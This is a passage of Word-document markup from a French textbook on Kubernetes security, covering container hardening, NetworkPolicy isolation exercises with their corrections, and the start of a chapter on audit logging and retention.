    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 91.2 — Isoler deux espaces de noms</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   SÉCURITÉ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le service de paiement ne doit pas être joignable depuis la boutique.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Refusez par défaut.</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Autorisez le DNS.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Autorisez la passerelle.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 91.3 — Vérifier un durcissement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   AUDIT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>L'équipe affirme avoir durci les conteneurs.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Contrôlez l'utilisateur.</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Contrôlez les capacités.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Tentez une écriture.</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91.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>securityContext:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  runAsNonRoot: true</w:t>
        <w:br/>
        <w:t xml:space="preserve">  runAsUser: 10001</w:t>
        <w:br/>
        <w:t xml:space="preserve">  seccompProfile: { type: RuntimeDefault }</w:t>
        <w:br/>
        <w:t>containers:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - name: api</w:t>
        <w:br/>
        <w:t xml:space="preserve">    securityContext:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      allowPrivilegeEscalation: false</w:t>
        <w:br/>
        <w:t xml:space="preserve">      readOnlyRootFilesystem: true</w:t>
        <w:br/>
        <w:t xml:space="preserve">      capabilities: { drop: ["ALL"] }</w:t>
        <w:br/>
        <w:t xml:space="preserve">    volumeMounts:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      - { name: tmp, mountPath: /tmp }</w:t>
        <w:br/>
        <w:t>volumes:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - name: tmp</w:t>
        <w:br/>
        <w:t xml:space="preserve">    emptyDir: { sizeLimit: 64Mi }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Sans volume temporaire, l'écriture dans </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>/tmp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> échoue et le service peut ne plus démarrer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Vérifiez avec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> après déploiement : le manifeste ne suffit pas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 91.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>apiVersion: networking.k8s.io/v1</w:t>
        <w:br/>
        <w:t>kind: NetworkPolicy</w:t>
        <w:br/>
        <w:t>metadata: { name: refus, namespace: paiement }</w:t>
        <w:br/>
        <w:t>spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  podSelector: {}</w:t>
        <w:br/>
        <w:t xml:space="preserve">  policyTypes: [Ingress, Egress]</w:t>
        <w:br/>
        <w:t>---</w:t>
        <w:br/>
        <w:t>apiVersion: networking.k8s.io/v1</w:t>
        <w:br/>
        <w:t>kind: NetworkPolicy</w:t>
        <w:br/>
        <w:t>metadata: { name: dns, namespace: paiement }</w:t>
        <w:br/>
        <w:t>spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  podSelector: {}</w:t>
        <w:br/>
        <w:t xml:space="preserve">  policyTypes: [Egress]</w:t>
        <w:br/>
        <w:t xml:space="preserve">  egress:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    - to:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        - namespaceSelector: { matchLabels: { kubernetes.io/metadata.name: kube-system } }</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ports: [{ protocol: UDP, port: 53 }, { protocol: TCP, port: 53 }]</w:t>
        <w:br/>
        <w:t>---</w:t>
        <w:br/>
        <w:t>apiVersion: networking.k8s.io/v1</w:t>
        <w:br/>
        <w:t>kind: NetworkPolicy</w:t>
        <w:br/>
        <w:t>metadata: { name: depuis-passerelle, namespace: paiement }</w:t>
        <w:br/>
        <w:t>spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  podSelector: { matchLabels: { app: paiement } }</w:t>
        <w:br/>
        <w:t xml:space="preserve">  policyTypes: [Ingress]</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ingress:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    - from:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        - namespaceSelector: { matchLabels: { kubernetes.io/metadata.name: ingress-nginx } }</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ports: [{ protocol: TCP, port: 8080 }]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le refus de sortie coupe le DNS : la règle DNS doit accompagner le refus.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Le test se fait depuis un pod de l'espace </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>boutique</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, qui doit voir sa connexion expirer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 91.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>kubectl exec -n boutique deploy/api -- id</w:t>
        <w:br/>
        <w:t>kubectl exec -n boutique deploy/api -- grep CapEff /proc/self/status</w:t>
        <w:br/>
        <w:t>kubectl exec -n boutique deploy/api -- touch /essai</w:t>
        <w:br/>
        <w:t>kubectl run test --rm -it --image=busybox -n boutique --restart=Never -- \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  wget -qO- --timeout=3 http://api:3000/sante</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Ces quatre commandes couvrent 80 % du risque réel.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un refus d'écriture et un timeout réseau sont de bons signes, pas des pannes.</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Qu'est-ce qui n'est pas isolé par un conteneur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Le système de fichiers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 noyau</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 réseau</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Les processus</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Quel réglage empêche l'écriture hors volumes ?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Option"/>
        <w:spacing w:before="0" w:after="20"/>
        <w:ind w:left="454" w:hanging="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">A) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>runAsNonRoot</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Option"/>
        <w:spacing w:before="0" w:after="20"/>
        <w:ind w:left="454" w:hanging="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">B) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>readOnlyRootFilesystem</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Option"/>
        <w:spacing w:before="0" w:after="20"/>
        <w:ind w:left="454" w:hanging="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">C) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>drop: ALL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Option"/>
        <w:spacing w:before="0" w:after="20"/>
        <w:ind w:left="454" w:hanging="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">D) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>seccomp</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Pourquoi un conteneur root est-il dangereux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Il consomme plus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Il dispose de plus de droits en cas de faille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Il démarre mieux</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Il est plus lent</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 faut-il autoriser après un refus réseau global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Rien</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 DNS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Tout le cluster</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Internet</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Comment vérifier un durcissement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Lire le manifeste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 xml:space="preserve">Exécuter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> et lire </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>/proc/self/status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Demander à l'équipe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Consulter le schéma</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Le noyau est partagé avec l'hôte.</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Il rend la racine du conteneur en lecture seule.</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L'impact d'une évasion ou d'une erreur devient majeur.</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Sans DNS, toutes les connexions par nom échouent.</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Seule l'exécution prouve l'état réel.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>92. Journalisation, audit et conservation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Garder les traces utiles, supprimer les données inutiles et pouvoir prouver ce qui s'est passé.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 3 h 00 · Niveau : Avancé · Prérequis : chapitre 91</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Distinguer journal d'application, journal d'audit et piste d'audit.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Concevoir une politique de rétention.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Protéger l'intégrité des journaux.</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Répondre à une demande d'accès ou de suppression.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Éviter la collecte inutile.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>92.1 Trois journaux différents</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un journal d'application raconte ce que fait le logiciel ; un journal d'audit raconte qui a modifié le système ; une piste d'audit métier raconte qui a exercé quelle action sur quelles données. Les trois n'ont ni la même durée de vie ni le même public.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.364 — Quatre journaux</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0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Journal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Contenu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="309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Destinataire</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Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Application</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Requêtes, erreurs, traces</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3091"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Équipe technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Système</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Services, noyau, authentification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Exploitation et sécurité</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Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Audit Kubernetes</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Appels à l'API</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3091"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Sécurité et conformité</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Métier</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Actions sur les données</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3091"/>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Métier et juridique</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JOURNAL D'AUDIT</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Enregistrement horodaté et attribuable des actions sensibles : qui, quand, depuis où, sur quelle ressource et avec quel résultat. Il doit être inaltérable.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="3175000"/>
            <wp:docPr id="109" name="Picture 109"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f107.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId149"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="3175000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.107 — Le trajet d'une trace</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une politique d'audit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Journal d'audit Kubernetes : politique minimale</w:t>
        <w:br/>
        <w:t>apiVersion: audit.k8s.io/v1</w:t>
        <w:br/>
        <w:t>kind: Policy</w:t>
        <w:br/>
        <w:t>rules:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - level: Metadata</w:t>
        <w:br/>
        <w:t xml:space="preserve">    verbs: ["get", "list", "watch"]</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - level: RequestResponse</w:t>
        <w:br/>
        <w:t xml:space="preserve">    verbs: ["create", "update", "patch", "delete"]</w:t>
        <w:br/>
        <w:t xml:space="preserve">    resources:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      - group: ""</w:t>
        <w:br/>
        <w:t xml:space="preserve">        resources: ["secrets", "configmaps"]</w:t>
        <w:br/>
        <w:t xml:space="preserve">      - group: "rbac.authorization.k8s.io"</w:t>
        <w:br/>
        <w:t xml:space="preserve">        resources: ["roles", "rolebindings", "clusterrolebindings"]</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - level: None</w:t>
        <w:br/>
        <w:t xml:space="preserve">    users: ["system:kube-proxy"]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.365 — Quatre niveaux</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83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Niveau</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Enregistre</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="29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Volume</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2833"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>None</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Rien</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Nul</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2833"/>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Metadata</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Qui, quoi, quand</w:t>
            </w:r>
          </w:p>
        </w:tc>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Faible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2833"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Request</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Métadonnées et corps de requête</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Moyen</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2833"/>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RequestResponse</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Requête et réponse</w:t>
            </w:r>
          </w:p>
        </w:tc>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Élevé</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>92.2 Rétention</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
